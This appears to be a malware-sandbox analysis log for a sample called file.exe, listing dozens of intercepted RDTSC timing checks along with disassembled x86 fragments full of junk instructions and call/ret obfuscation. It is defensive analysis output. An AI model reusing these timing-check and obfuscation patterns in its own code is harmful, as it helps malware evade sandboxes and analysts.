                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A53FA second address: 13A53FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A587E second address: 13A5895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F53h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5895 second address: 13A58E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F2A68BD69DEh 0x0000000c jmp 00007F2A68BD69DBh 0x00000011 popad 0x00000012 pushad 0x00000013 jnc 00007F2A68BD69ECh 0x00000019 jmp 00007F2A68BD69E6h 0x0000001e push ecx 0x0000001f je 00007F2A68BD69D6h 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A81DD second address: 13A81E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8293 second address: 13A8297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8312 second address: 13A836B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e jno 00007F2A68BE4F47h 0x00000014 call 00007F2A68BE4F49h 0x00000019 ja 00007F2A68BE4F4Eh 0x0000001f push eax 0x00000020 jmp 00007F2A68BE4F4Fh 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A836B second address: 13A8371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8371 second address: 13A8389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F54h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8389 second address: 13A838D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A838D second address: 13A843C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jno 00007F2A68BE4F5Dh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F2A68BE4F57h 0x00000019 pop eax 0x0000001a mov ecx, ebx 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F2A68BE4F48h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov esi, dword ptr [ebp+122D3781h] 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D1D08h], esi 0x00000046 push 00000003h 0x00000048 jmp 00007F2A68BE4F57h 0x0000004d push 886E84CCh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jnp 00007F2A68BE4F46h 0x0000005b jmp 00007F2A68BE4F4Dh 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A843C second address: 13A8488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jne 00007F2A68BD69D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 37917B34h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F2A68BD69D8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f lea ebx, dword ptr [ebp+1246A06Ch] 0x00000035 jng 00007F2A68BD69DAh 0x0000003b push edi 0x0000003c pushad 0x0000003d popad 0x0000003e pop edi 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8488 second address: 13A848D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A848D second address: 13A8492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8492 second address: 13A8498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A84E1 second address: 13A84E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A84E7 second address: 13A85B7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BE4F4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F2A68BE4F48h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 call 00007F2A68BE4F52h 0x0000002e mov ecx, dword ptr [ebp+122D37DDh] 0x00000034 pop ecx 0x00000035 push 71160F76h 0x0000003a jnl 00007F2A68BE4F50h 0x00000040 xor dword ptr [esp], 71160FF6h 0x00000047 jng 00007F2A68BE4F4Bh 0x0000004d mov edi, 7AFD2A1Eh 0x00000052 pushad 0x00000053 or ecx, 7E1FC0B3h 0x00000059 movsx ecx, ax 0x0000005c popad 0x0000005d push 00000003h 0x0000005f mov dx, ax 0x00000062 push 00000000h 0x00000064 jmp 00007F2A68BE4F58h 0x00000069 push 00000003h 0x0000006b jmp 00007F2A68BE4F58h 0x00000070 call 00007F2A68BE4F49h 0x00000075 push eax 0x00000076 push edx 0x00000077 push ecx 0x00000078 jc 00007F2A68BE4F46h 0x0000007e pop ecx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A85B7 second address: 13A85CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69DFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9462 second address: 13C946D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C946D second address: 13C947F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2A68BD69D8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C947F second address: 13C9485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9485 second address: 13C9489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C75D5 second address: 13C75E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F4Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C78C3 second address: 13C78E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F2A68BD69E8h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7A44 second address: 13C7A53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7A53 second address: 13C7A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69E7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7E3B second address: 13C7E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8224 second address: 13C823F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A68BD69D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2A68BD69DFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C823F second address: 13C8248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8248 second address: 13C8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007F2A68BD69DEh 0x0000000e push eax 0x0000000f jmp 00007F2A68BD69E0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8271 second address: 13C827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D97E second address: 138D988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D988 second address: 138D98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85C0 second address: 13C85C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8BA3 second address: 13C8BC0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BE4F48h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A68BE4F4Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8BC0 second address: 13C8BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8EA8 second address: 13C8EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jc 00007F2A68BE4F46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C92D5 second address: 13C92DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138BE7C second address: 138BE81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138BE81 second address: 138BEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 jmp 00007F2A68BD69E6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138BEAC second address: 138BEB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0712 second address: 13D0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A68BD69D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2A68BD69E4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3006 second address: 13D3021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2A68BE4F55h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3021 second address: 13D3040 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2A68BD69DAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A68BD69DFh 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6ABF second address: 13D6AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2A68BE4F46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2A68BE4F58h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6AE6 second address: 13D6AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6C46 second address: 13D6C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007F2A68BE4F4Eh 0x0000000d pushad 0x0000000e jne 00007F2A68BE4F46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6C64 second address: 13D6CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 je 00007F2A68BD69DCh 0x0000000f push edi 0x00000010 jmp 00007F2A68BD69E7h 0x00000015 jmp 00007F2A68BD69E9h 0x0000001a pop edi 0x0000001b pushad 0x0000001c jmp 00007F2A68BD69DFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7290 second address: 13D7299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7299 second address: 13D72B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2A68BD69DAh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jg 00007F2A68BD69D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8390 second address: 13D83BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F51h 0x00000009 popad 0x0000000a popad 0x0000000b add dword ptr [esp], 43244B47h 0x00000012 or edi, dword ptr [ebp+122D35A1h] 0x00000018 push 63D63667h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D83BE second address: 13D83C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A68BD69D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D83C9 second address: 13D83CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8523 second address: 13D852E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2A68BD69D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D852E second address: 13D8533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D86F0 second address: 13D86F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D86F6 second address: 13D86FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D89D4 second address: 13D89E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8AD8 second address: 13D8AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A68BE4F4Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F2A68BE4F46h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8AF8 second address: 13D8B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9069 second address: 13D9071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D912C second address: 13D914F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov dword ptr [ebp+122D344Fh], esi 0x00000010 nop 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D914F second address: 13D9153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9153 second address: 13D9184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F2A68BD69E0h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9184 second address: 13D918A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D94B4 second address: 13D94B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D96DA second address: 13D96F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA59A second address: 13DA5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC1C1 second address: 13DC224 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F2A68BE4F48h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jmp 00007F2A68BE4F4Ch 0x0000002a push 00000000h 0x0000002c jmp 00007F2A68BE4F56h 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+122D3297h] 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c push ebx 0x0000003d jc 00007F2A68BE4F46h 0x00000043 pop ebx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DBF69 second address: 13DBF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69DCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DCCC9 second address: 13DCD26 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A68BE4F4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F2A68BE4F48h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 or esi, dword ptr [ebp+122D3731h] 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D3621h] 0x00000033 push 00000000h 0x00000035 jmp 00007F2A68BE4F54h 0x0000003a xchg eax, ebx 0x0000003b jc 00007F2A68BE4F50h 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD7F8 second address: 13DD7FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD582 second address: 13DD588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD7FE second address: 13DD83D instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A68BD69D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor dword ptr [ebp+122D1D08h], edi 0x00000015 push 00000000h 0x00000017 cmc 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b sub esi, dword ptr [ebp+122D372Dh] 0x00000021 mov edx, 3A94850Bh 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F2A68BD69E4h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE44C second address: 13DE451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2116 second address: 13E211C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4F87 second address: 13E4FA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F2A68BE4F4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF7DC second address: 13DF7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E40B4 second address: 13E40B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF7E0 second address: 13DF7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F30 second address: 13E5F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E40B9 second address: 13E40C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F3E second address: 13E5F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
